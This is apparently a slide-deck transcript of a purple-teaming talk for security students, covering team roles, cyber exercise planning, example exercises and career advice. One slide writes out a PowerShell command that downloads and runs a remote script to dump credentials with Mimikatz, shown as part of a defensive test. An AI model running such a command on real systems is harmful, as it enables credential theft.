This is a talk I presented to students at UOIT. Edited to be more relevant for networking / security 1st and 2nd year students

1. @haydnjohnson
Purple Team what,
why, how, even
Students - Feel free to reach out to me and ask any questions. We gotta look after our
own Canadians

2. @haydnjohnson
Whoami
Haydn Johnson
Security Analyst | Manager | Purple Teamer
Points (points.com)
@haydnjohnson
Talks: Bsides, Circle City Con, HackFest, SecTor.
NolaCon
Offsec, Purple Team, Gym??
http://www.slideshare.net/HaydnJohnson

3. 3
I work here!

4. @haydnjohnson
1.
Outline
give a summary of (something).

5. @haydnjohnson
Outline
Terminology
❏ Security in General
❏ Red Team
❏ Blue Team
What is Purple Teaming
❏ Core concept
❏ Process
❏ Togetherness
Examples of Purple Teaming
❏ NMap
❏ Mimikatz
❏ Attachment Testing
❏ Table Top
❏ BloodHound
❏ OpenDLP

6. @haydnjohnson
Full disclosure
❏ Most slides taken from
my Purple Team OWASP
Austin Talk
❏ Re-adjusted for students

7. @haydnjohnson
Security in general

8. @haydnjohnson
What is this security thing?
No clear definition!
Many different parts of security
CIA Triangle

9. @haydnjohnson
What is this security thing?
CONFIDENTIALITY
INTEGRITY
AVAILABILITY

10. @haydnjohnson
What is this security thing?
AVAILABILITY
Business only see:

11. @haydnjohnson
What is this security thing?
Types of Jobs:
❏ Security Manager
❏ Intrusion Analyst
❏ Incident Responder
❏ Policy Analyst
❏ GRC / Audit
❏ Penetration Tester
❏ Red Teamer
❏ Exploit Developer
❏ Threat Intelligence
❏ + MANY MORE

12. @haydnjohnson
Purple Team
OR
Questions / Career Discussion

13. @haydnjohnson
1.
Terminology
What means what
https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf

14. @haydnjohnson
Terminology

15. @haydnjohnson
Terminology
Vulnerability Assessment Person - Run Vuln
Scanner....hey client you suck
Penetration Tester - Metasploit / MSF PRO (FTW)...hey
client you suck
Red Teaming - Phish, move laterally, find “sensitive stuff”,
maybe custom implant...hey client you suck
Purple Teaming - You did all the above, but got to charge
for an extra body and to tell the client how they suck in
person

16. @haydnjohnson
Terminology
Red Teaming - “Red Team engagements are the full
spectrum warfare of security assessments. In a red team
engagement, the consultants attack the client organization
using physical means, social engineering, and
technological avenues. “
From: http://winterspite.com/security/phrasing/

17. @haydnjohnson
Terminology
From: http://winterspite.com/security/phrasing/
Red Teaming

18. @haydnjohnson
From: Chris Nickerson Lares Consulting

19. @haydnjohnson
Terminology
Blue Team
❏ Network defenders
❏ Support
❏ Firewalls | Blinky Boxes
❏ Responders

20. @haydnjohnson
Terminology
Purple Team
❏ Working together to achieve the ultimate goal of
making the organization more secure
❏ different threats & attacker mindset
❏ incident detection and response
❏ policy and procedures
❏ tuning of controls

21. @haydnjohnson

22. @haydnjohnson
2.
Purple Team
Process
what | how

23. @haydnjohnson
Purple Team
❏ Conducting focused pentesting (up to Red
Teaming) with clear training objectives for the
Blue Team.
❏ It isn't a "can you get access to X" exercise it is
a "train the Blue Team on X" exercise. The
pentesting activities are a means to conduct
realistic training.

24. @haydnjohnson
Purple Team
Primary result of the exercise is to create an
intrusion event (aka get caught) to test
instrumentation (host/ network), validate
detection processes and procedures, validate
protections in place, force response procedures
and post mortems.
Differs from Red Team where primary goal is to
NOT get caught

25. @haydnjohnson
Purple Team
❏ Togetherness
AttackDefend

26. @haydnjohnson
3.
Cyber Exercises
MITRE cyber exercise playbook
https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf

27. @haydnjohnson

28. @haydnjohnson
Events / Injects
Events - generally executed by the Red Team to elicit
responses from the Blue Team in specific phases,
focused on the objectives of the exercise.

29. @haydnjohnson
Different Teams
within cyber exercises

30. @haydnjohnson
Exercises - Teams
ECG GREY
RED BLUE

31. @haydnjohnson
Exercises - Teams
Exercise Control Group
Take information from other teams and make
decision to ensure the exercise is “controlled” and
reaches its goals.
IR Manager
Team Lead
VP
ECG

32. @haydnjohnson
Exercises - Teams
Gray Team / Observers
Observe the Blue Team's reaction or non-reaction and
report back to ECG.
Ongoing process
IR Manager
Team Lead
VP
GREY

33. @haydnjohnson
Exercises - Teams

34. @haydnjohnson
Phases
of cyber exercises

35. @haydnjohnson
Phases of a Cyber Exercise
❏ Plan
❏ Execution
❏ Lessons Learned

36. @haydnjohnson
Exercises - Planning
Preliminary
Meeting
Middle
Meetings
Final
Meeting

37. @haydnjohnson
Exercises - Planning
“By failing to prepare, you are preparing to fail.”
Benjamin Franklin
Everything needs consideration, pros, cons and a
plan!
1. Brainstorming
2. Action Items
3. Budget / Approval

38. @haydnjohnson
Exercises - Planning
Each team needs to know the end goals (except Blue)
Red Team needs to know what injects and when.
Goals:
1. To prevent confusion
2. Finalize Objectives
3. Identify if training is required
4. Decide on Use Cases

39. @haydnjohnson
Exercises - Ideas
Initial Weakness
New technology
New Team
Test assumption
Budget
Devils advocate

40. @haydnjohnson
Exercises - Ideas
https://github.com/aptnotes/data/blob/master/APTnotes.csv

41. @haydnjohnson
Exercises - Execution
❏ Execution
❏ Go Time
❏ Observe, Change, Observe
Be Dynamic

42. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
RT tasked with
action

43. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
RT tasked with
action
Execute inject /
event

44. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
3
Collects
information
RT tasked with
action
Execute inject /
event

45. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
1
2
3
4
Collects
information
Feedback to ECG
RT tasked with
action
Execute inject /
event

46. @haydnjohnson
Exercises - Execution
What if no response?
No Alerts?

47. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
!
Check for
hackers.fu

48. @haydnjohnson
Exercise
Control
Group
Red
Team
Training
Audience
Observers
!
Check alert for
mal.exe

49. @haydnjohnson
Exercises - Lessons Learned
❏ What observations were made during the
exercise.
What went well, what didn’t
Positive and negative - constructive

50. @haydnjohnson
Exercises - Lessons Learned
❏ Internally we need to prepare better
❏ Ensure findings are document
❏ Think of more alternative tests

51. @haydnjohnson
Exercises - Lessons Learned
Exercise
Good
Bad
Improvements Follow-up

52. @haydnjohnson
Exercises - Lessons Learned
Collect Information from everyone
Strengthen future exercises
Exercise
Control
Group
Red
Team
Training
Audience
Observers

53. @haydnjohnson
4.
Example exercises
Using CKC & EKC

54. @haydnjohnson
Nmap
Mimikatz
Malicious Attachment Testing
BloodHound
Tabletop Exercise
OpenDLP

55. @haydnjohnson
Port Scanning Detection
Nmap

56. @haydnjohnson
Example 1 - Nmap
# of People Required: 1
Level of knowledge required: Little
Documentation online: Many
Time to Test Minimal
Disruption to Business None

57. @haydnjohnson
Example 1 - Nmap
Test if Nmap / Port scans can be seen internally or
externally
What do the alerts look like?

58. @haydnjohnson
Example 1 - Nmap
Start Basic
Increase complexity
Fragmentation

59. @haydnjohnson
Example 1 - Nmap
$END POINT SOLUTION catches Nmap
$EPS misses fragmentation / slow scans
Each workstation gives ALERT
Try with Avast, McAfee, Symantec etc

60. @haydnjohnson
Example 1 - Nmap
https://nmap.org/book/man-bypass-firewalls-ids.html

61. @haydnjohnson
Example 1 - Nmap
Why Nmap? APT won’t use Nmap
❏ It is a start
❏ Simple & cheap
❏ Test current technology

62. @haydnjohnson
Example 1 - PowerShell
Advancing the exercise

63. @haydnjohnson
PowerShell Remoting
Mimikatz

64. @haydnjohnson
Example 2- Credentials in Memory
# of People Required: 1 -2
Level of knowledge required: Little
Documentation online: Many
Time to Test Minimal
Disruption to Business None

65. @haydnjohnson
Example 2- Credentials in Memory
Helpdesk / Ops wants a secure way to remotely
manage workstation(s).
RDP | VNC - no thanks
Want to use PowerShell Remoting because easier and
‘secure’
https://blog.netspi.com/powershell-remoting-cheatsheet/

66. @haydnjohnson
Example 2- Credentials in Memory
Requirements
❏ Ease of use
❏ Secure
❏ Auditbility
Research shows this is possible

67. @haydnjohnson
Example 2- Credentials in Memory
Steps:
○ Before PS-Remoting ○ After PS-Remoting

68. @haydnjohnson
Example 2- Credentials in Memory
❏ Need to know for sure
❏ Want to test credentials are safe
❏ See for self
Mimikatz comes in

69. @haydnjohnson
Example 2- Credentials in Memory
Command Run:
powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI');
Invoke-Mimikatz -DumpCreds | Out-File pre.txt”
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-pa
sswords-with.html

70. @haydnjohnson
Example 2- Credentials in Memory
Dumping credentials

71. @haydnjohnson
Example 2- Credentials in Memory
PS-Remote

72. @haydnjohnson
Example 2- Credentials in Memory
Compare

73. @haydnjohnson
Example 2 - Credentials in
Memory
Thumbs up success gift] / image

74. @haydnjohnson
Example 2- Credentials in Memory
Success!
❏ Need to document
❏ Have justification to Implement!
❏ Security Gives sign off!

75. @haydnjohnson
email filter
Malicious
Attachment
Testing

76. @haydnjohnson
Example 3 - Malicious Attachment
Testing
<Email> is great at filtering malicious emails,
attachments etc.
We want to see what gets through to know what to
expect
“What could get through”

77. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Malicious File Maker
@carnal0wnage
https://github.com/carnal0wnage/malicious_file_make
r

78. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Automates sending

79. @haydnjohnson
Example 3 - Malicious Attachment
Testing
AV Pop-Ups

80. @haydnjohnson
Example 3 - Malicious Attachment
Testing

81. @haydnjohnson
Example 3 - Malicious Attachment
Testing

82. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Not script kiddie friendly

83. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Some attachments you cannot send

84. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Receiving file attachments

85. @haydnjohnson
Example 3 - Malicious Attachment
Testing
The goal:
❏ Confirm email attachment filtering
❏ Confirm attachments that bypass
❏ Document findings for reference
❏ Potential defenses / future steps

86. @haydnjohnson
Example 3 - Malicious Attachment
Testing
Which allows us:
❏ Potential tuning to block file types
❏ Research file types for use in the wild
❏ Identification of compensating controls

87. @haydnjohnson
BloodHound
Domain Admin
Paths

88. @haydnjohnson
Example 4 - Domain Admin Paths
# of People Required: 1 -2
Level of knowledge required: Enough to install the tool
Documentation online: Installation instructions
Time to Test Minimal
Disruption to Business Potential to pop alerts

89. @haydnjohnson
Example 4 - Domain Admin Paths
Goals:
❏ Identify Domain Admins
❏ Identify derivative admins
❏ Weakness in the chain of trust

90. @haydnjohnson
Example 4 - Domain Admin Paths
BloodHound command:
https://blog.stealthbits.com/attacking-active-directory-permissions-with-bloodhound/
https://wald0.com/?p=112
https://github.com/BloodHoundAD/BloodHound/wiki/Getting-started

91. @haydnjohnson
Example 4 - Domain Admin Paths
Tested with helpdesk access

92. @haydnjohnson
Example 4 - Domain Admin Paths
Mystery account “SUPERHERO” identified via ACLs

93. @haydnjohnson
Example 4 - Domain Admin Paths
❏ Follow up on mystery account
❏ Create Ticket
❏ Does it require the access it has?
Test with a group that has less access

94. @haydnjohnson
Table Top Exercise

95. @haydnjohnson
Example 4 - Table Top Exercise
# of People Required: Many
Level of knowledge required: Varied
Documentation online: Yes
Time to Test Long term
Disruption to Business 1 day +

96. @haydnjohnson
Example 4 - Table Top Exercise
Goals:
❏ Raise awareness
❏ Practice before it happens

97. @haydnjohnson
Example 4 - Table Top Exercise
Pre Hack
During
Post
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-
approach-attack-prevention-35302

98. @haydnjohnson
Example 4 - Table Top Exercise
Pre Hack
$Group Threaten Company
https://www.sans.org/reading-room/whitepapers/analyst/killing-advanced-threats-tracks-intelligent-
approach-attack-prevention-35302

99. @haydnjohnson

100. @haydnjohnson
Example 4 - Table Top Exercise
Response A

101. @haydnjohnson
Example 4 - Table Top Exercise
Response B

102. @haydnjohnson
Example 4 - Table Top Exercise
ECURITY
C - LEVEL
PR
IT

103. @haydnjohnson
Example 4 - Table Top Exercise
Technical Response
IR
Hardening
Public Response
Disclosure
Insurance

104. @haydnjohnson
Example 4 - Table Top Exercise
Do this for each stage:
❏ Pre Hack
❏ During
❏ Post Hack

105. @haydnjohnson
OpenDLP
Lateral Movement

106. @haydnjohnson
Example 5 - Lateral Movement
# of People Required: 1-2
Level of knowledge required: Ability to find network shares
Documentation online: Yes
Time to Test hours
Disruption to Business Minimal

107. @haydnjohnson
Example 5 - Lateral Movement
Goals:
❏ Is there sensitive information at rest?
❏ What data could be accessed on network shares

108. @haydnjohnson
Please note
❏ Exercises do not have to be ‘offsec’ tool focused
❏ Attacker mindset is important
❏ Testing assumptions

109. @haydnjohnson
Example 5 - Lateral Movement
OpenDLP
❏ Data Loss prevention tool
❏ Identifies sensitive data at rest on thousands of
systema
❏ Not easy to install
https://github.com/ezarko/opendlp

110. @haydnjohnson
Example 5 - Lateral Movement
OpenDLP Video Reference
Bsides Cleveland 2017
Blue-Teamin' on a Budget [of Zero]
https://www.youtube.com/watch?v=77M0aO2F2fU

111. @haydnjohnson
Example 5 - Lateral Movement
❏ Download OVA
❏ Transfer sc.exe from XP 32bit
❏ Install browser sert
❏ Start apache
❏ connect

112. @haydnjohnson
Example 5 - Lateral Movement
Issues with install:
❏ sc.exe 32bit
❏ Accessing web server
❏ Solution:
XP
http://www.makeuseof.com/tag/download-wi
ndows-xp-for-free-and-legally-straight-from-
microsoft-si/

113. @haydnjohnson
Example 5 - Lateral Movement
Import cert

114. @haydnjohnson
Example 5 - Lateral Movement
Looks like this

115. @haydnjohnson
Example 5 - Lateral Movement
❏ PII
❏ Credit card data etc

116. @haydnjohnson
Example 5 - Lateral Movement
Report looks like:

117. @haydnjohnson
Example 5 - Lateral Movement
❏ This is still a work in progress.
❏ Wondering how I can create a process out of it

118. @haydnjohnson
Conclusion

119. @haydnjohnson
5.
Career / Infosec
Stuff
Ask questions.
Open Forum

120. @haydnjohnson
My Career in Depth

121. @haydnjohnson
From Australia
Masters of I.T - infosec specialization
Internship @ Deloitte Australia
Graduate program @ Deloitte
Move to Deloitte Canada
Move to KPMG Canada
Move to Points

122. @haydnjohnson
Social Media
Infosec Twitter

123. @haydnjohnson
Infosec Twitter
General information
Feeling part of a community
Mentors / Mentees
Motivation

124. @haydnjohnson
Speaking publicly

125. @haydnjohnson
Speaking / Publicity
Local Bsides Toronto
CO submission to Circle City Con
CO Submission to HackFest
BsidesLV Mentee program (Proving grounds)
CO Submission to SecTor (Chris Gates mentoring)

126. @haydnjohnson
Speaking / Publicity
Benefits
❏ Knowing your topic enough to speak
❏ Communication Skills
❏ Networking
❏ Speaking itself

127. @haydnjohnson
Github

128. @haydnjohnson
Github
❏ I sort of have one
❏ Lots of dead end projects
❏ Contributed to Gdog

129. @haydnjohnson
GitHub
Benefits
❏ Shows more than a CV
❏ Contribute to known projects
❏ Little projects that are recorded

130. @haydnjohnson
Questions
Career stuff
others